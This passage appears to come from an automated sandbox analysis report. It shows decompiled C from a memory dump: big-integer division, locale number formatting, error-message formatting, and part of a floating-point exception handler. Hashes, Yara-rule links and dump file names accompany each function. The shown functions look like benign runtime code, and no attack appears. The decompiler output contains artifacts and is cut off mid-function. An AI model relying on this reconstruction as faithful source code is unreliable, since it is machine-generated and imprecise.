              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: .
              • API String ID: 0-248832578
              • Opcode ID: 963f9eae5f88599b801194f34669f8dc52acce189864739caf8099f36b5619d9
              • Instruction ID: 1731f6a540c4ef6dae94fa2d7b22a8d90cfaf5458b910d551fabe4a99d91ec5f
              • Opcode Fuzzy Hash: 963f9eae5f88599b801194f34669f8dc52acce189864739caf8099f36b5619d9
              • Instruction Fuzzy Hash: 1731D4729002496FCF249E78CC84EFABBBDDF86314F1801A8E459D7251E6309D458BB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9C0B0, Relevance: 3.5, APIs: 2, Instructions: 464COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 90%
              			E00D9C0B0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00D8DDA0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00DA0DE0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00D8DDC0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00D8DDC0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xd9d6cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00DA0DE0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00D9AA64(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00D9AA64(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00D9AA64(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































              0x00d9c0bc
              0x00d9c0bf
              0x00d9c0c3
              0x00d9c0cd
              0x00d9c0d0
              0x00d9c0d2
              0x00d9c0d4
              0x00d9c0e1
              0x00d9c0e1
              0x00d9c0e4
              0x00d9c0e4
              0x00d9c0e7
              0x00d9c0ea
              0x00d9c0ec
              0x00d9c21f
              0x00d9c221
              0x00d9c26a
              0x00d9c26e
              0x00d9c274
              0x00d9c223
              0x00d9c225
              0x00d9c228
              0x00d9c22a
              0x00d9c22d
              0x00d9c22f
              0x00d9c231
              0x00d9c265
              0x00d9c265
              0x00d9c265
              0x00d9c233
              0x00d9c238
              0x00d9c23e
              0x00d9c23e
              0x00d9c241
              0x00d9c243
              0x00d9c245
              0x00000000
              0x00000000
              0x00d9c247
              0x00d9c248
              0x00d9c24b
              0x00d9c24e
              0x00d9c250
              0x00000000
              0x00d9c252
              0x00000000
              0x00d9c252
              0x00000000
              0x00d9c250
              0x00d9c254
              0x00d9c25b
              0x00d9c25f
              0x00d9c263
              0x00000000
              0x00000000
              0x00d9c263
              0x00d9c266
              0x00d9c266
              0x00d9c268
              0x00d9c275
              0x00d9c278
              0x00d9c27b
              0x00d9c27e
              0x00d9c27e
              0x00d9c282
              0x00d9c285
              0x00d9c288
              0x00d9c28b
              0x00d9c296
              0x00d9c28d
              0x00d9c292
              0x00d9c292
              0x00d9c2a0
              0x00d9c2a5
              0x00d9c2a8
              0x00d9c2aa
              0x00d9c2b4
              0x00d9c2b7
              0x00d9c2be
              0x00d9c2c1
              0x00d9c2c4
              0x00d9c2cc
              0x00d9c2d2
              0x00d9c2d2
              0x00d9c2d2
              0x00d9c2d2
              0x00d9c2c4
              0x00d9c2d7
              0x00d9c2de
              0x00d9c2de
              0x00d9c2e1
              0x00d9c2e4
              0x00d9c516
              0x00d9c516
              0x00d9c2ea
              0x00d9c2ea
              0x00d9c2f0
              0x00d9c2f3
              0x00d9c2f6
              0x00d9c2f9
              0x00d9c2fc
              0x00d9c2ff
              0x00d9c302
              0x00d9c302
              0x00d9c305
              0x00d9c30c
              0x00d9c30c
              0x00d9c307
              0x00d9c307
              0x00d9c307
              0x00d9c30e
              0x00d9c312
              0x00d9c315
              0x00d9c317
              0x00d9c31a
              0x00d9c321
              0x00d9c324
              0x00d9c327
              0x00d9c332
              0x00d9c335
              0x00d9c33a
              0x00d9c33f
              0x00d9c346
              0x00d9c34b
              0x00d9c34d
              0x00d9c34f
              0x00d9c353
              0x00d9c356
              0x00d9c359
              0x00d9c361
              0x00d9c36a
              0x00d9c36a
              0x00d9c36c
              0x00d9c36f
              0x00d9c36f
              0x00d9c359
              0x00d9c379
              0x00d9c37e
              0x00d9c383
              0x00d9c385
              0x00d9c388
              0x00d9c38a
              0x00d9c38d
              0x00d9c390
              0x00d9c392
              0x00d9c395
              0x00d9c398
              0x00d9c39a
              0x00d9c3a1
              0x00d9c3a6
              0x00d9c3a9
              0x00d9c3b3
              0x00d9c3b5
              0x00d9c3b7
              0x00d9c3ba
              0x00d9c3ba
              0x00d9c3bc
              0x00d9c3bf
              0x00d9c3c2
              0x00d9c3c5
              0x00d9c3c8
              0x00d9c39c
              0x00d9c39c
              0x00d9c39f
              0x00000000
              0x00000000
              0x00d9c39f
              0x00d9c3cb
              0x00d9c3cd
              0x00d9c3cf
              0x00000000
              0x00d9c3d1
              0x00d9c3d1
              0x00d9c3d4
              0x00d9c3d6
              0x00d9c3d6
              0x00d9c3e4
              0x00d9c3e7
              0x00d9c3ec
              0x00d9c3ee
              0x00000000
              0x00000000
              0x00d9c3f0
              0x00d9c3f7
              0x00d9c3f7
              0x00d9c3fa
              0x00d9c3fd
              0x00d9c400
              0x00d9c403
              0x00d9c403
              0x00d9c406
              0x00d9c409
              0x00d9c40d
              0x00d9c410
              0x00d9c412
              0x00d9c415
              0x00000000
              0x00000000
              0x00d9c417
              0x00d9c415
              0x00d9c3f2
              0x00d9c3f2
              0x00d9c3f5
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9c3f5
              0x00d9c41c
              0x00d9c41c
              0x00000000
              0x00d9c41c
              0x00d9c419
              0x00000000
              0x00d9c419
              0x00d9c3d4
              0x00d9c3cf
              0x00d9c41f
              0x00d9c41f
              0x00d9c421
              0x00d9c42b
              0x00d9c42b
              0x00d9c42e
              0x00d9c430
              0x00d9c432
              0x00d9c434
              0x00d9c439
              0x00d9c43c
              0x00d9c43c
              0x00d9c43f
              0x00d9c442
              0x00d9c445
              0x00d9c447
              0x00d9c45c
              0x00d9c45e
              0x00d9c460
              0x00d9c462
              0x00d9c464
              0x00d9c466
              0x00d9c468
              0x00d9c46a
              0x00d9c46d
              0x00d9c46d
              0x00d9c471
              0x00d9c473
              0x00d9c479
              0x00d9c47c
              0x00d9c47c
              0x00d9c47c
              0x00d9c480
              0x00d9c480
              0x00d9c485
              0x00d9c488
              0x00d9c488
              0x00d9c48d
              0x00d9c48f
              0x00d9c491
              0x00d9c498
              0x00d9c498
              0x00d9c49a
              0x00d9c49f
              0x00d9c4a1
              0x00d9c4a4
              0x00d9c4a4
              0x00d9c4a7
              0x00d9c4b0
              0x00d9c4b0
              0x00d9c4b2
              0x00d9c4b2
              0x00d9c4b7
              0x00d9c4bd
              0x00d9c4c1
              0x00d9c4c4
              0x00d9c4c7
              0x00d9c4c9
              0x00d9c4c9
              0x00d9c4c9
              0x00d9c4ce
              0x00d9c4ce
              0x00d9c4d1
              0x00d9c4d4
              0x00d9c493
              0x00d9c493
              0x00d9c496
              0x00000000
              0x00000000
              0x00d9c496
              0x00d9c491
              0x00d9c4db
              0x00d9c4db
              0x00d9c4dc
              0x00d9c423
              0x00d9c423
              0x00d9c425
              0x00000000
              0x00000000
              0x00d9c425
              0x00d9c4ec
              0x00d9c4f1
              0x00d9c4f4
              0x00d9c4f8
              0x00d9c4f9
              0x00d9c4fc
              0x00d9c4ff
              0x00d9c500
              0x00d9c503
              0x00d9c506
              0x00d9c509
              0x00d9c50c
              0x00d9c50c
              0x00d9c514
              0x00d9c51b
              0x00d9c51c
              0x00d9c51e
              0x00d9c520
              0x00d9c522
              0x00d9c525
              0x00d9c530
              0x00d9c530
              0x00d9c536
              0x00d9c536
              0x00d9c539
              0x00d9c53a
              0x00d9c53a
              0x00d9c530
              0x00d9c53e
              0x00d9c540
              0x00d9c542
              0x00d9c544
              0x00d9c544
              0x00d9c546
              0x00d9c54a
              0x00000000
              0x00000000
              0x00d9c54c
              0x00d9c54c
              0x00d9c54f
              0x00d9c551
              0x00000000
              0x00000000
              0x00000000
              0x00d9c551
              0x00d9c544
              0x00d9c553
              0x00d9c55d
              0x00000000
              0x00000000
              0x00000000
              0x00d9c268
              0x00d9c0f2
              0x00d9c0f2
              0x00d9c0f2
              0x00d9c0f5
              0x00d9c0f8
              0x00d9c0fb
              0x00d9c12c
              0x00d9c12e
              0x00d9c179
              0x00d9c17b
              0x00d9c182
              0x00d9c189
              0x00d9c18c
              0x00d9c18f
              0x00d9c195
              0x00d9c195
              0x00d9c196
              0x00d9c199
              0x00d9c1a0
              0x00d9c1a9
              0x00d9c1ae
              0x00d9c1b1
              0x00d9c1b6
              0x00d9c1b9
              0x00d9c1bb
              0x00d9c1c0
              0x00d9c1c3
              0x00d9c1c6
              0x00d9c1c6
              0x00d9c1c6
              0x00d9c1ca
              0x00d9c1cd
              0x00d9c1cd
              0x00d9c1d2
              0x00d9c1d2
              0x00d9c1dd
              0x00d9c1e8
              0x00d9c1e8
              0x00d9c1eb
              0x00d9c1f7
              0x00d9c1fc
              0x00d9c207
              0x00d9c209
              0x00d9c20b
              0x00d9c211
              0x00d9c216
              0x00d9c218
              0x00d9c21e
              0x00d9c130
              0x00d9c13c
              0x00d9c13c
              0x00d9c13f
              0x00d9c14f
              0x00d9c155
              0x00d9c15c
              0x00d9c15e
              0x00d9c166
              0x00d9c168
              0x00d9c16a
              0x00d9c16f
              0x00d9c172
              0x00d9c178
              0x00d9c178
              0x00d9c0fd
              0x00d9c100
              0x00d9c104
              0x00d9c10a
              0x00d9c119
              0x00d9c123
              0x00d9c12b
              0x00d9c12b
              0x00d9c0fb
              0x00d9c0d6
              0x00d9c0d9
              0x00d9c0df
              0x00d9c0df
              0x00d9c0c5
              0x00d9c0cb
              0x00d9c0cb

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
              • Instruction ID: e0438155360cc001d7d3ae6662468cb53c0152576e10f9eeef2d25afe158dc31
              • Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
              • Instruction Fuzzy Hash: 10021D71E102199FDF14CFA9C9906ADB7F1FF48314F29826AD919E7380D731AA41CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D89D99, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D89D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xdad610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xdcde30 = _v304;
					 *0xdcde32 = 0;
					 *0xdad610 = 0xdcde30;
				}
				E00D7F980(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xdad600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







              0x00d89db1
              0x00d89dbf
              0x00d89dcc
              0x00d89dd4
              0x00d89dda
              0x00d89dda
              0x00d89df0
              0x00d89df5
              0x00d89dfa
              0x00d89e04
              0x00d89e0e
              0x00d89e16
              0x00d89e21

              APIs
              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D89DBF
              • GetNumberFormatW.KERNEL32 ref: 00D89E0E
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FormatInfoLocaleNumber
              • String ID:
              • API String ID: 2169056816-0
              • Opcode ID: fa1680e0e99f92f5d9ffc95e3dfea0b3f5d7864661f2f709f99d9ee2351af5a4
              • Instruction ID: cb2080e34cc823b13c14cc5a18df5f78c9fe026a5b8addc075061955eb378c7e
              • Opcode Fuzzy Hash: fa1680e0e99f92f5d9ffc95e3dfea0b3f5d7864661f2f709f99d9ee2351af5a4
              • Instruction Fuzzy Hash: 74017C35140309BADB109FA4DC45FABB7BDEF1A710F004422FA49DB2A0E37099248BB5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D76D06, Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E00D76D06(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}





              0x00d76d06
              0x00d76d0e
              0x00000000
              0x00d76d35
              0x00d76d27
              0x00d76d2f
              0x00000000

              APIs
              • GetLastError.KERNEL32(00D80DE0,?,00000200), ref: 00D76D06
              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D76D27
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: 67225546fb426680b3961c7cffcf859db16d3d2a2b97f7e3733eca71b7cfda5b
              • Instruction ID: fae289cf28dbe97fcc4cb3de3a841034e91d1c312c9be2b50d5245c9ad08ded6
              • Opcode Fuzzy Hash: 67225546fb426680b3961c7cffcf859db16d3d2a2b97f7e3733eca71b7cfda5b
              • Instruction Fuzzy Hash: 16D0C971398702BEFA210A768C0AF7A7B95B756F82F20C904B35AE90E0E670D014D63D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00DA0654, Relevance: 1.8, APIs: 1, Instructions: 269COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00DA0654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00D9DFB6(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
